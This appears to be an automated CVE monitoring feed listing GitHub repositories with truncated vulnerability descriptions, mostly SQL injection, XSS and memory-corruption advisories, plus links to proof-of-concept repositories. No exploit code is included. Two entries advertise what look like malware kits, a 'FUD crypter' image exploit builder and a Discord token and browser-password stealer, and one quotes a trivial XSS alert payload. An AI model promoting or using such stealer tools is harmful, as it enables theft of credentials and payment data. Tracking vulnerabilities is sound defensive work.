**Memory corruption in display due to double free while allocating frame buffer memory CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25717](https://github.com/Live-Hack-CVE/CVE-2022-25717) create time: 2023-01-09T11:53:28Z

**Denial of service while processing fastboot flash command on mmc due to buffer over read CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22079](https://github.com/Live-Hack-CVE/CVE-2022-22079) create time: 2023-01-09T11:53:23Z

**Memory corruption in Automotive due to integer overflow to buffer overflow while registering a new listener with shared buffer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33219](https://github.com/Live-Hack-CVE/CVE-2022-33219) create time: 2023-01-09T11:53:19Z

**Memory corruption in Bluetooth HOST due to buffer overflow while parsing the command response received from remote CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22088](https://github.com/Live-Hack-CVE/CVE-2022-22088) create time: 2023-01-09T11:53:14Z

**IBM Security Verify Governance 10.0 stores user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 225232. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22470](https://github.com/Live-Hack-CVE/CVE-2022-22470) create time: 2023-01-09T11:53:10Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45883](https://github.com/Live-Hack-CVE/CVE-2022-45883) create time: 2023-01-09T11:53:06Z

**Memory corruption due to stack-based buffer overflow in Core CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40520](https://github.com/Live-Hack-CVE/CVE-2022-40520) create time: 2023-01-09T11:53:02Z

**Transient DOS due to buffer over-read in WLAN while parsing WLAN CSA action frames. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33285](https://github.com/Live-Hack-CVE/CVE-2022-33285) create time: 2023-01-09T11:52:57Z

**Information exposure in DSP services due to improper handling of freeing memory CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25722](https://github.com/Live-Hack-CVE/CVE-2022-25722) create time: 2023-01-09T11:52:53Z

**Memory corruption in Multimedia Framework due to unsafe access to the data members CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25716](https://github.com/Live-Hack-CVE/CVE-2022-25716) create time: 2023-01-09T11:52:48Z

**A vulnerability was found in kaltura mwEmbed up to 2.91. It has been rated as problematic. Affected by this issue is some unknown functionality of the file modules/KalturaSupport/components/share/share.js of the component Share Plugin. The manipulation of the argument res leads to cross site scripting. The attack may b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4882](https://github.com/Live-Hack-CVE/CVE-2022-4882) create time: 2023-01-09T11:52:44Z

**MatrixSSL 4.0.4 through 4.5.1 has an integer overflow in matrixSslDecodeTls13. A remote attacker might be able to send a crafted TLS Message to cause a buffer overflow and achieve remote code execution. This is fixed in 4.6.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43974](https://github.com/Live-Hack-CVE/CVE-2022-43974) create time: 2023-01-09T11:52:40Z

**CVE-2017-7308 POC** : [anldori/CVE-2017-7308](https://github.com/anldori/CVE-2017-7308) create time: 2023-01-09T09:55:20Z

**CVE-2017-16995 Linux POC** : [anldori/CVE-2017-16995](https://github.com/anldori/CVE-2017-16995) create time: 2023-01-09T09:50:41Z

**Modbus Slave缓冲区溢出漏洞CVE-2022-1068分析与复现** : [webraybtl/CVE-2022-1068](https://github.com/webraybtl/CVE-2022-1068) create time: 2023-01-09T08:23:37Z

**Kernel subsystem within OpenHarmony-v3.1.4 and prior versions in kernel_liteos_a has a kernel stack overflow vulnerability when call SysTimerGettime. 4 bytes padding data from kernel stack are copied to user space incorrectly and leaked. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43662](https://github.com/Live-Hack-CVE/CVE-2022-43662) create time: 2023-01-09T06:27:14Z

**Kernel subsystem within OpenHarmony-v3.1.4 and prior versions in kernel_liteos_a has a kernel stack overflow vulnerability when call SysClockGettime. 4 bytes padding data from kernel stack are copied to user space incorrectly and leaked. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45126](https://github.com/Live-Hack-CVE/CVE-2022-45126) create time: 2023-01-09T06:27:00Z

**All versions of the package wifey are vulnerable to Command Injection via the connect() function due to improper input sanitization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25890](https://github.com/Live-Hack-CVE/CVE-2022-25890) create time: 2023-01-09T06:26:56Z

**CVE-2022-46689** : [straight-tamago/FileSwitcherX](https://github.com/straight-tamago/FileSwitcherX) create time: 2023-01-05T21:50:25Z

**platform_callback_stub in misc subsystem within OpenHarmony-v3.0.5 and prior versions has an authentication bypass vulnerability which allows an "SA relay attack".Local attackers can bypass authentication and attack other SAs with high privilege. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0036](https://github.com/Live-Hack-CVE/CVE-2023-0036) create time: 2023-01-09T06:27:10Z

**softbus_client_stub in communication subsystem within OpenHarmony-v3.0.5 and prior versions has an authentication bypass vulnerability which allows an "SA relay attack".Local attackers can bypass authentication and attack other SAs with high privilege. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0035](https://github.com/Live-Hack-CVE/CVE-2023-0035) create time: 2023-01-09T06:27:05Z

**CVE-2022-31705 (Geekpwn 2022 Vmware EHCI OOB) POC** : [s0duku/cve-2022-31705](https://github.com/s0duku/cve-2022-31705) create time: 2023-01-09T04:27:15Z

**no description** : [Arrnitage/CVE-2022-23131_exp](https://github.com/Arrnitage/CVE-2022-23131_exp) create time: 2023-01-09T04:10:08Z

**A vulnerability has been found in yanheven console and classified as problematic. Affected by this vulnerability is the function get_zone_hosts/AvailabilityZonesTable of the file openstack_dashboard/dashboards/admin/aggregates/tables.py. The manipulation leads to cross site scripting. The attack can be launched remotel CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125070](https://github.com/Live-Hack-CVE/CVE-2014-125070) create time: 2023-01-08T19:25:58Z

**A vulnerability classified as critical was found in purpleparrots 491-Project. This vulnerability affects unknown code of the file update.php of the component Highscore Handler. The manipulation leads to sql injection. The name of the patch is a812a5e4cf72f2a635a716086fe1ee2b8fa0b1ab. It is recommended to apply a patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10031](https://github.com/Live-Hack-CVE/CVE-2015-10031) create time: 2023-01-08T19:26:10Z

**A vulnerability was found in mrtnmtth joomla_mod_einsatz_stats up to 0.2. It has been classified as critical. This affects the function getStatsByType of the file helper.php. The manipulation of the argument year leads to sql injection. Upgrading to version 0.3 is able to address this issue. The name of the patch is 27 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15016](https://github.com/Live-Hack-CVE/CVE-2016-15016) create time: 2023-01-08T19:26:06Z

**A vulnerability, which was classified as problematic, was found in viafintech Barzahlen Payment Module PHP SDK up to 2.0.0. Affected is the function verify of the file src/Webhook.php. The manipulation leads to observable timing discrepancy. Upgrading to version 2.0.1 is able to address this issue. The name of the patc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15015](https://github.com/Live-Hack-CVE/CVE-2016-15015) create time: 2023-01-08T19:26:02Z

**A vulnerability, which was classified as problematic, has been found in 01-Scripts 01ACP. This issue affects some unknown processing. The manipulation of the argument $_SERVER['SCRIPT_NAME'] leads to cross site scripting. The attack may be initiated remotely. The name of the patch is a16eb7da46ed22bc61067c212635394f257 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4309](https://github.com/Live-Hack-CVE/CVE-2021-4309) create time: 2023-01-08T19:26:14Z

**JFrog Artifactory prior to 7.37.13 is vulnerable to Authentication Bypass, which can lead to Privilege Escalation when a specially crafted request is sent by an unauthenticated user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0668](https://github.com/Live-Hack-CVE/CVE-2022-0668) create time: 2023-01-08T17:15:50Z

**A vulnerability classified as critical has been found in lojban jbovlaste. This affects an unknown part of the file dict/listing.html. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The name of the patch is 6ff44c2e87b1113eb07d76ea62e1f64193b04d15. It is recommended to apply a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25072](https://github.com/Live-Hack-CVE/CVE-2018-25072) create time: 2023-01-08T16:10:41Z

**A vulnerability was found in CapsAdmin PAC3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lua/pac3/core/shared/http.lua. The manipulation of the argument url leads to cross site scripting. The attack may be launched remotely. The name of the patch is 8fc9e12dfa21d75 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4881](https://github.com/Live-Hack-CVE/CVE-2022-4881) create time: 2023-01-08T16:10:45Z

**Sophos EXploit** : [kevinsmith96/CVE-2022-1040](https://github.com/kevinsmith96/CVE-2022-1040) create time: 2023-01-08T15:46:00Z

**A vulnerability was found in saxman maps-js-icoads. It has been classified as problematic. Affected is an unknown function. The manipulation leads to exposure of information through directory listing. It is possible to launch the attack remotely. The name of the patch is 34b8b0cce2807b119f4cffda2ac48fc8f427d69a. It is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125069](https://github.com/Live-Hack-CVE/CVE-2014-125069) create time: 2023-01-08T13:57:05Z

**A vulnerability was found in saxman maps-js-icoads and classified as critical. This issue affects some unknown processing of the file http-server.js. The manipulation leads to path traversal. The name of the patch is 34b8b0cce2807b119f4cffda2ac48fc8f427d69a. It is recommended to apply a patch to fix this issue. The ass CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125068](https://github.com/Live-Hack-CVE/CVE-2014-125068) create time: 2023-01-08T13:57:01Z

**A vulnerability was found in happyman twmap. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file twmap3/data/ajaxCRUD/pointdata2.php. The manipulation of the argument id leads to sql injection. Upgrading to version v2.9_v4.31 is able to address this issue. The name o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25100](https://github.com/Live-Hack-CVE/CVE-2019-25100) create time: 2023-01-08T13:57:10Z

**A vulnerability, which was classified as critical, has been found in web-cyradm. Affected by this issue is some unknown functionality of the file auth.inc.php. The manipulation of the argument login/login_password/LANG leads to sql injection. The attack may be launched remotely. The name of the patch is 2bcbead3bdb5f11 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-10002](https://github.com/Live-Hack-CVE/CVE-2007-10002) create time: 2023-01-08T11:46:34Z

**A vulnerability was found in emmflo yuko-bot. It has been declared as problematic. This vulnerability affects unknown code. The manipulation of the argument title leads to denial of service. The attack can be initiated remotely. The name of the patch is e580584b877934a4298d4dd0c497c79e579380d0. It is recommended to app CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125066](https://github.com/Live-Hack-CVE/CVE-2014-125066) create time: 2023-01-08T11:46:59Z

**A vulnerability classified as critical was found in corincerami curiosity. Affected by this vulnerability is an unknown functionality of the file app/controllers/image_controller.rb. The manipulation of the argument sol leads to sql injection. The name of the patch is d64fddd74ca72714e73f4efe24259ca05c8190eb. It is rec CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125067](https://github.com/Live-Hack-CVE/CVE-2014-125067) create time: 2023-01-08T11:46:38Z

**A vulnerability has been found in SUKOHI Surpass and classified as critical. This vulnerability affects unknown code of the file src/Sukohi/Surpass/Surpass.php. The manipulation of the argument dir leads to pathname traversal. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is d22337d453 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10030](https://github.com/Live-Hack-CVE/CVE-2015-10030) create time: 2023-01-08T11:46:43Z

**A vulnerability, which was classified as critical, was found in pouetnet pouet 2.0. This affects an unknown part. The manipulation of the argument howmany leads to sql injection. The name of the patch is 11d615931352066fb2f6dcb07428277c2cd99baf. It is recommended to apply a patch to fix this issue. The identifier VDB-2 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36648](https://github.com/Live-Hack-CVE/CVE-2020-36648) create time: 2023-01-08T11:46:51Z

**A vulnerability classified as critical has been found in YunoHost-Apps transmission_ynh. Affected is an unknown function of the file conf/nginx.conf. The manipulation leads to path traversal. The name of the patch is f136dfd44eda128129e5fd2d850a3a3c600e6a4a. It is recommended to apply a patch to fix this issue. VDB-217 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36647](https://github.com/Live-Hack-CVE/CVE-2020-36647) create time: 2023-01-08T11:46:47Z

**A vulnerability was found in WebPA up to 3.1.1. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. Upgrading to version 3.1.2 is able to address this issue. The name of the patch is 8836c4f549181e885a68e0e7ca561fdbcbd04bf0. It is recommended to upgrade th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4308](https://github.com/Live-Hack-CVE/CVE-2021-4308) create time: 2023-01-08T11:46:55Z

**Vulnerability Disclosure Timeline Closer inspection of the Exploit JPG content reveals the malicious link as well as the URL Download and Execute of the tool used to generate the Exploit JPG from Python encrypted code content which we also implement in couple of our builders.Silent JPG Exploit There are multiple Exploit JPG in Silent JPG Exploit, a** : [Falkenburggg/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/Falkenburggg/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-01-08T10:35:53Z

**Get system info (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen metrics, Installed apps) Chromium based browsers (passwords, credit cards, cookies, history, autofill, bookmarks) Firefox based browsers (db files, cookies, history, bookmarks) Internet explorer/Edge (passwords)** : [Falkenburggg/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/Falkenburggg/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-01-08T10:35:29Z

**A vulnerability was found in ttskch PaginationServiceProvider up to 0.x. It has been declared as critical. This vulnerability affects unknown code of the file demo/index.php of the component demo. The manipulation of the argument sort/id leads to sql injection. Upgrading to version 1.0.0 is able to address this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125029](https://github.com/Live-Hack-CVE/CVE-2014-125029) create time: 2023-01-07T23:47:26Z

**A vulnerability was found in slackero phpwcms up to 1.9.26 and classified as critical. Affected by this issue is some unknown functionality. The manipulation of the argument $phpwcms['db_prepend'] leads to sql injection. The attack may be launched remotely. Upgrading to version 1.9.27 is able to address this issue. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4301](https://github.com/Live-Hack-CVE/CVE-2021-4301) create time: 2023-01-07T23:47:30Z

**A vulnerability has been found in SourceCodester Loan Management System and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2666](https://github.com/Live-Hack-CVE/CVE-2022-2666) create time: 2023-01-07T23:47:42Z

**A vulnerability classified as problematic has been found in SourceCodester Royale Event Management System 1.0. Affected is an unknown function of the file /royal_event/companyprofile.php. The manipulation of the argument companyname/regno/companyaddress/companyemail leads to cross site scripting. It is possible to laun CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1102](https://github.com/Live-Hack-CVE/CVE-2022-1102) create time: 2023-01-07T23:47:38Z

**A vulnerability was found in SourceCodester Royale Event Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /royal_event/userregister.php. The manipulation leads to improper authentication. The attack may be initiated remotely. The identifier VDB-195785 was assi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1101](https://github.com/Live-Hack-CVE/CVE-2022-1101) create time: 2023-01-07T23:47:34Z

**A vulnerability was found in DrAzraelTod pyChao and classified as critical. Affected by this issue is the function klauen/lesen of the file mod_fun/__init__.py. The manipulation leads to sql injection. The name of the patch is 9d8adbc07c384ba51c2583ce0819c9abb77dc648. It is recommended to apply a patch to fix this issu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10009](https://github.com/Live-Hack-CVE/CVE-2013-10009) create time: 2023-01-07T21:36:48Z

**A vulnerability was found in ada-l0velace Bid and classified as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is abd71140b8219fa8741d0d8a57ab27d5bfd34222. It is recommended to apply a patch to fix this issue. The identifier VDB-217625 was assigned t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125063](https://github.com/Live-Hack-CVE/CVE-2014-125063) create time: 2023-01-07T21:37:27Z

**A vulnerability, which was classified as critical, was found in john5223 bottle-auth. Affected is an unknown function. The manipulation leads to sql injection. The name of the patch is 99cfbcc0c1429096e3479744223ffb4fda276875. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125065](https://github.com/Live-Hack-CVE/CVE-2014-125065) create time: 2023-01-07T21:37:19Z

**A vulnerability, which was classified as critical, has been found in elgs gosqljson. This issue affects the function QueryDbToArray/QueryDbToMap/ExecDb of the file gosqljson.go. The manipulation of the argument sqlStatement leads to sql injection. The name of the patch is 2740b331546cb88eb61771df4c07d389e9f0363a. It is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125064](https://github.com/Live-Hack-CVE/CVE-2014-125064) create time: 2023-01-07T21:36:52Z

**A vulnerability has been found in ss15-this-is-sparta and classified as problematic. This vulnerability affects unknown code of the file js/roomElement.js of the component Main Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is ba2f71ad3a46e5949ee0c510b5 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10028](https://github.com/Live-Hack-CVE/CVE-2015-10028) create time: 2023-01-07T21:37:31Z

**A vulnerability classified as problematic was found in kelvinmo simplexrd up to 3.1.0. This vulnerability affects unknown code of the file simplexrd/simplexrd.class.php. The manipulation leads to xml external entity reference. Upgrading to version 3.1.1 is able to address this issue. The name of the patch is 4c9f2e0285 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10029](https://github.com/Live-Hack-CVE/CVE-2015-10029) create time: 2023-01-07T21:36:56Z

**A vulnerability has been found in CESNET theme-cesnet up to 1.x and classified as problematic. Affected by this vulnerability is an unknown functionality of the file cesnet/core/lostpassword/templates/resetpassword.php. The manipulation leads to insufficiently protected credentials. Attacking locally is a requirement. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15014](https://github.com/Live-Hack-CVE/CVE-2016-15014) create time: 2023-01-07T21:37:04Z

**A vulnerability was found in ForumHulp searchresults. It has been rated as critical. Affected by this issue is the function list_keywords of the file event/listener.php. The manipulation of the argument word leads to sql injection. The name of the patch is dd8a312bb285ad9735a8e1da58e9e955837b7322. It is recommended to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15013](https://github.com/Live-Hack-CVE/CVE-2016-15013) create time: 2023-01-07T21:36:59Z

**A vulnerability was found in Symbiote Seed up to 6.0.2. It has been classified as critical. Affected is the function onBeforeSecurityLogin of the file code/extensions/SecurityLoginExtension.php of the component Login. The manipulation of the argument URL leads to open redirect. It is possible to launch the attack remot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20164](https://github.com/Live-Hack-CVE/CVE-2017-20164) create time: 2023-01-07T21:37:07Z

**A vulnerability, which was classified as critical, was found in square squalor. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version v0.0.0 is able to address this issue. The name of the patch is f6f0a47cc344711042eb0970cb423e6950ba3f93. It is recommended to upgrade the affected c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36645](https://github.com/Live-Hack-CVE/CVE-2020-36645) create time: 2023-01-07T21:37:23Z

**A vulnerability classified as problematic has been found in MediaArea ZenLib up to 0.4.38. This affects the function Ztring::Date_From_Seconds_1970_Local of the file Source/ZenLib/Ztring.cpp. The manipulation of the argument Value leads to unchecked return value to null pointer dereference. Upgrading to version 0.4.39 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36646](https://github.com/Live-Hack-CVE/CVE-2020-36646) create time: 2023-01-07T21:37:11Z

**A vulnerability was found in Yomguithereal Baobab up to 2.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack can be launched remotely. Upgrading CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4307](https://github.com/Live-Hack-CVE/CVE-2021-4307) create time: 2023-01-07T21:37:15Z

**Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit.** : [v0lp3/CVE-2022-39073](https://github.com/v0lp3/CVE-2022-39073) create time: 2023-01-07T20:46:20Z

**A vulnerability classified as critical was found in ananich bitstorm. Affected by this vulnerability is an unknown functionality of the file announce.php. The manipulation of the argument event leads to sql injection. The name of the patch is ea8da92f94cdb78ee7831e1f7af6258473ab396a. It is recommended to apply a patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125062](https://github.com/Live-Hack-CVE/CVE-2014-125062) create time: 2023-01-07T19:26:32Z

**A vulnerability, which was classified as problematic, has been found in hydrian TTRSS-Auth-LDAP. Affected by this issue is some unknown functionality of the component Username Handler. The manipulation leads to ldap injection. Upgrading to version 2.0b1 is able to address this issue. The name of the patch is a7f7a5a82d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10027](https://github.com/Live-Hack-CVE/CVE-2015-10027) create time: 2023-01-07T19:26:36Z

**A vulnerability classified as problematic has been found in cronvel terminal-kit up to 2.1.7. Affected is an unknown function. The manipulation leads to inefficient regular expression complexity. Upgrading to version 2.1.8 is able to address this issue. The name of the patch is a2e446cc3927b559d0281683feb9b821e83b758c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4306](https://github.com/Live-Hack-CVE/CVE-2021-4306) create time: 2023-01-07T19:26:40Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in peel filebroker and classified as critical. Affected by this issue is the function select_transfer_status_desc of the file lib/common.rb. The manipulation leads to sql injection. The name of the patch is 91097e26a6c84d3208a351a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125061](https://github.com/Live-Hack-CVE/CVE-2014-125061) create time: 2023-01-07T16:11:04Z

**A vulnerability, which was classified as critical, was found in holdennb CollabCal. Affected is the function handleGet of the file calenderServer.cpp. The manipulation leads to improper authentication. It is possible to launch the attack remotely. The name of the patch is b80f6d1893607c99e5113967592417d0fe310ce6. It is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125060](https://github.com/Live-Hack-CVE/CVE-2014-125060) create time: 2023-01-07T16:11:00Z

**A vulnerability, which was classified as problematic, has been found in sternenseemann sternenblog. This issue affects the function blog_index of the file main.c. The manipulation of the argument post_path leads to file inclusion. The attack may be initiated remotely. Upgrading to version 0.1.0 is able to address this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125059](https://github.com/Live-Hack-CVE/CVE-2014-125059) create time: 2023-01-07T16:10:55Z

**A vulnerability was found in tiredtyrant flairbot. It has been declared as critical. This vulnerability affects unknown code of the file flair.py. The manipulation leads to sql injection. The name of the patch is 5e112b68c6faad1d4699d02c1ebbb7daf48ef8fb. It is recommended to apply a patch to fix this issue. VDB-217618 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10026](https://github.com/Live-Hack-CVE/CVE-2015-10026) create time: 2023-01-07T16:11:17Z

**A vulnerability has been found in luelista miniConf up to 1.7.6 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file miniConf/MessageView.cs of the component URL Scanning. The manipulation leads to denial of service. Upgrading to version 1.7.7 and 1.8.0 is able to addres CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10025](https://github.com/Live-Hack-CVE/CVE-2015-10025) create time: 2023-01-07T16:11:13Z

**A vulnerability classified as critical was found in hoffie larasync. This vulnerability affects unknown code of the file repository/content/file_storage.go. The manipulation leads to path traversal. The name of the patch is 776bad422f4bd4930d09491711246bbeb1be9ba5. It is recommended to apply a patch to fix this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10024](https://github.com/Live-Hack-CVE/CVE-2015-10024) create time: 2023-01-07T16:11:08Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in forcedotcom SalesforceMobileSDK-Windows up to 4.x. It has been rated as critical. This issue affects the function ComputeCountSql of the file SalesforceSDK/SmartStore/Store/QuerySpec.cs. The manipulation leads to sql injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15012](https://github.com/Live-Hack-CVE/CVE-2016-15012) create time: 2023-01-07T16:11:23Z

**A vulnerability was found in stakira OpenUtau. It has been classified as critical. This affects the function VoicebankInstaller of the file OpenUtau.Core/Classic/VoicebankInstaller.cs of the component ZIP Archive Handler. The manipulation leads to path traversal. Upgrading to version 0.0.991 is able to address this iss CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4880](https://github.com/Live-Hack-CVE/CVE-2022-4880) create time: 2023-01-07T16:11:27Z

**There is stored XSS in https://p1ay8y3ar.github.io/cve_monitor/. Vulnerable argument "ServiceSetIdentifier" is in file /goform/wlanPrimaryNetwork. PoC: alert("Subcribe to t.me/LamerZen")** : [Zenmovie/CVE-2022-Stored-XSS-in-cve-monitor](https://github.com/Zenmovie/CVE-2022-Stored-XSS-in-cve-monitor) create time: 2023-01-07T15:19:29Z

**A vulnerability was found in LearnMeSomeCodes project3 and classified as critical. This issue affects the function search_first_name of the file search.rb. The manipulation leads to sql injection. The name of the patch is d3efa17ae9f6b2fc25a6bbcf165cefed17c7035e. It is recommended to apply a patch to fix this issue. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125058](https://github.com/Live-Hack-CVE/CVE-2014-125058) create time: 2023-01-07T14:00:30Z

**A vulnerability classified as critical has been found in Fumon trello-octometric. This affects the function main of the file metrics-ui/server/srv.go. The manipulation of the argument num leads to sql injection. The name of the patch is a1f1754933fbf21e2221fbc671c81a47de6a04ef. It is recommended to apply a patch to fix CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10023](https://github.com/Live-Hack-CVE/CVE-2015-10023) create time: 2023-01-07T14:00:21Z

**A vulnerability was found in IISH nlgis2. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file scripts/etl/custom_import.pl. The manipulation leads to sql injection. The name of the patch is 8bdb6fcf7209584eaf1232437f0f53e735b2b34c. It is recommended to apply a patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10022](https://github.com/Live-Hack-CVE/CVE-2015-10022) create time: 2023-01-07T14:00:17Z

**A vulnerability was found in ritterim definely. It has been classified as problematic. Affected is an unknown function of the file src/database.js. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is b31a022ba4d8d17148445a13ebb5a42ad593dbaa. It is recom CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10021](https://github.com/Live-Hack-CVE/CVE-2015-10021) create time: 2023-01-07T14:00:13Z

**A vulnerability has been found in polterguy Phosphorus Five up to 8.2 and classified as critical. This vulnerability affects the function csv.Read of the file plugins/extras/p5.mysql/NonQuery.cs of the component CSV Import. The manipulation leads to sql injection. Upgrading to version 8.3 is able to address this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25070](https://github.com/Live-Hack-CVE/CVE-2018-25070) create time: 2023-01-07T14:00:34Z

**A vulnerability was found in roxlukas LMeve up to 0.1.58. It has been rated as critical. Affected by this issue is the function insert_log of the file wwwroot/ccpwgl/proxy.php. The manipulation of the argument fetch leads to sql injection. Upgrading to version 0.1.59-beta is able to address this issue. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25071](https://github.com/Live-Hack-CVE/CVE-2018-25071) create time: 2023-01-07T14:00:26Z

**no description** : [wr0x00/cve-2022-23131](https://github.com/wr0x00/cve-2022-23131) create time: 2023-01-07T14:09:40Z

**A vulnerability, which was classified as problematic, was found in agnivade easy-scrypt. Affected is the function VerifyPassphrase of the file scrypt.go. The manipulation leads to observable timing discrepancy. Upgrading to version 1.0.0 is able to address this issue. The name of the patch is 477c10cf3b144ddf96526aa09f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125055](https://github.com/Live-Hack-CVE/CVE-2014-125055) create time: 2023-01-07T11:49:36Z

**A vulnerability classified as critical was found in koroket RedditOnRails. This vulnerability affects unknown code of the component Vote Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The name of the patch is 7f3c7407d95d532fcc342b00d68d0ea09ca71030. It is recommended CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125054](https://github.com/Live-Hack-CVE/CVE-2014-125054) create time: 2023-01-07T11:49:32Z

**A vulnerability was found in mrobit robitailletheknot. It has been classified as problematic. This affects an unknown part of the file app/filters.php of the component CSRF Token Handler. The manipulation of the argument _token leads to incorrect comparison. It is possible to initiate the attack remotely. The name of t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125057](https://github.com/Live-Hack-CVE/CVE-2014-125057) create time: 2023-01-07T11:49:24Z

**A vulnerability was found in Pylons horus and classified as problematic. Affected by this issue is some unknown functionality of the file horus/flows/local/services.py. The manipulation leads to observable timing discrepancy. The name of the patch is fd56ccb62ce3cbdab0484fe4f9c25c4eda6c57ec. It is recommended to apply CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125056](https://github.com/Live-Hack-CVE/CVE-2014-125056) create time: 2023-01-07T11:49:21Z

